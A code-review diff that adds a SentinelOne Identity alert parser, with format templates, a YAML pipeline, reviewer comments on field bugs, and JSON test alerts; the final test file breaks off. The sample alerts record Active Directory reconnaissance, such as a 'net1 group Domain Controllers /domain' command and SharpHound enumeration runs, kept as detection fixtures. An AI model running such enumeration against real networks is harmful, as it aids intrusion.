+ {
+ "field": "sentinelone.identity.name"
+ },
+ {
+ "field": "sentinelone.identity.status"
+ }
+ ]
+ },
+ {
+ "value": "Alert defined {sentinelone.identity.name} on {process.command_line}",
+ "conditions": [
+ {
+ "field": "sentinelone.identity.name"
+ },
+ {
+ "field": "process.command_line"
+ }
+ ]
+ },
+ {
+ "value": "Alert defined {sentinelone.identity.name}",
+ "conditions": [
+ {
+ "field": "sentinelone.identity.name"
+ }
+ ]
+ }
+]
diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
new file mode 100644
index 000000000..90577404d
--- /dev/null
+++ b/SentinelOne/identity/ingest/parser.yml
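Review bot: The `"Alert defined {sentinelone.identity.name} …"` wording reads as if a rule were being created rather than fired, which is confusing in an event list; a phrasing such as `"{sentinelone.identity.name} alert ({sentinelone.identity.status}) on {process.command_line}"` states what happened. Consider also surfacing `sentinelone.identity.confidenceLevel` (MALICIOUS in every sample alert of this commit) in the first two variants, since that is the value an analyst triages on.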
@@ -0,0 +1,67 @@
+name: identity
+pipeline:
+ - name: json_event
+ external:
+ name: json.parse-json
+ properties:
+ input_field: "{{original.message}}"
+
+ - name: detected_at
+ filter: "{{json_event.message.detectedAt != null}}"
+ external:
+ name: date.parse
+ properties:
+ input_field: "{{json_event.message.detectedAt}}"
+ output_field: timestamp
+
+ - name: started_at
+ filter: "{{json_event.message.firstSeenAt != null}}"
+ external:
+ name: date.parse
+ properties:
+ input_field: "{{json_event.message.firstSeenAt}}"
+ output_field: timestamp
+
+ - name: last_seen_at
+ filter: "{{json_event.message.lastSeenAt != null}}"
+ external:
+ name: date.parse
+ properties:
+ input_field: "{{json_event.message.lastSeenAt}}"
+ output_field: timestamp
+
+ - name: set_meta_fields
+stages:
+ set_meta_fields:
+ actions:
+ - set:
+ event.kind: "alert"
+ event.category: "intrusion_detection"
+ event.type: "info"
+ observer.vendor: "SentinelOne"
+ observer.product: "Singularity Identity"
+
+ "@timestamp": "{{detected_at.timestamp}}"
+ event.start: "{{started_at.timestamp}}"
+ event.end: "{{last_seen_at.timestamp}}"
+
+ event.provider: "{{json_event.message.detectionSource.product}}"
+ event.reason: "{{json_event.message.description}}"
+
+ process.command_line: "{{json_event.message.process.cmdLine}}"
+ process.parent.name: "{{json_event.message.process.parentName}}"
+
+ process.executable: "{{json_event.message.process.file.path}}"
+ process.name: "{{json_event.message.process.file.path | basename}}"
+ process.hash.sha1: "{{json_event.message.process.file.sha1}}"
+ process.hash.sha256: "{{json_event.message.process.file.sha256}}"
+ process.hash.md5: "{{json_event.message.process.file.md5}}"
+
+ sentinelone.identity.id: "{{json_event.message.id}}"
+ sentinelone.identity.name: "{{json_event.message.name}}"
+ sentinelone.identity.attackSurfaces: "{{json_event.message.attackSurfaces}}"
+ sentinelone.identity.status: "{{json_event.message.status}}"
+ sentinelone.identity.classification: "{{json_event.message.classification}}"
+ sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}"
+ sentinelone.identity.result: "{{json_event.message.result}}"
+ sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"
diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json
new file mode 100644
index 000000000..8d5dcf96a
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_1.json
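Review bot: The last line of the set_meta_fields stage reads `json_event.message.storyLineId`, but every sample alert in this commit spells the source key `storylineId` (lower-case l), so `sentinelone.identity.storyLineId` can never be populated — the tests pass only because the value is null in all of them. The same stage sets `event.category` and `event.type` as bare strings while the other parsers in this tree pin them as lists (`["authentication"]`, `["process"]`), and it copies the hashes verbatim, so the upper-case sha256 in the samples will not match the lower-case hashes cloud_funnel2.0 writes into `related.hash`, defeating cross-source pivots. Read `storylineId`, list-ify the two ECS fields (updating the expected outputs accordingly), and lower-case the hashes with a `lower` filter if the template engine provides one — checking that a null sha1/md5 (test_alert_1) still yields no field, the way `basename` on a null path already does in test_alert_10.
```yaml
      - set:
          event.kind: "alert"
          event.category: ["intrusion_detection"]
          event.type: ["info"]
          # … unchanged: observer.*, timestamps, event.provider/reason, process.command_line/parent.name/executable/name …
          process.hash.sha1: "{{json_event.message.process.file.sha1 | lower}}"
          process.hash.sha256: "{{json_event.message.process.file.sha256 | lower}}"
          process.hash.md5: "{{json_event.message.process.file.md5 | lower}}"
          # … unchanged: sentinelone.identity.id/name/attackSurfaces/status/classification/confidenceLevel/result …
          sentinelone.identity.storyLineId: "{{json_event.message.storylineId}}"
```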
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}" + }, + "expected": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": 
\"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T05:35:09Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T05:35:09Z", + "type": "info" + }, + "@timestamp": "2024-11-22T05:35:09Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain", + "executable": "c:\\windows\\system32\\net1.exe", + "hash": { + "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + }, + "name": "net1.exe" + }, + "related": { + "hash": [ + "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "ba485919-e4c1-4496-9e2f-feb320f6841a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_10.json b/SentinelOne/identity/tests/test_alert_10.json new file mode 100644 index 000000000..deb56e2a5 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_10.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:09:48.731000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:09:48.731000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:09:48.731000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": 
"UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935322-7b49-71f0-89e0-f52562c26e53", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json new file mode 100644 index 000000000..84d64cee6 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_11.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": 
"2024-11-22T08:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d00e-7616-81b9-fcb227ebb13d", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json new file mode 100644 index 000000000..3e75c9e78 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_12.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:51Z", + "kind": "alert", + "provider": 
"Identity", + "reason": "This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-eb28-7a57-9c27-87843b2cec61", + "name": "AD Service Account Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json new file mode 100644 index 000000000..d94a9c18b --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_13.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", 
+ "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-c715-72c9-bbd9-dc1ff6a7ff1e", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json new file mode 100644 index 000000000..f8a4295bb --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_14.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + 
"reason": "This event is generated when a command used to query or read the ACL's\\ Permission of any object in Active Directory.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-cb9b-770e-96ee-632d4d21520b", + "name": "AD ACL Enumeration", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json new file mode 100644 index 000000000..3d07d62a5 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_15.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": 
"Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d4ba-7131-9e08-defa8b3aeb52", + "name": "Domain Users Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json new file mode 100644 index 000000000..0a9dc292d --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_2.json 
@@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", 
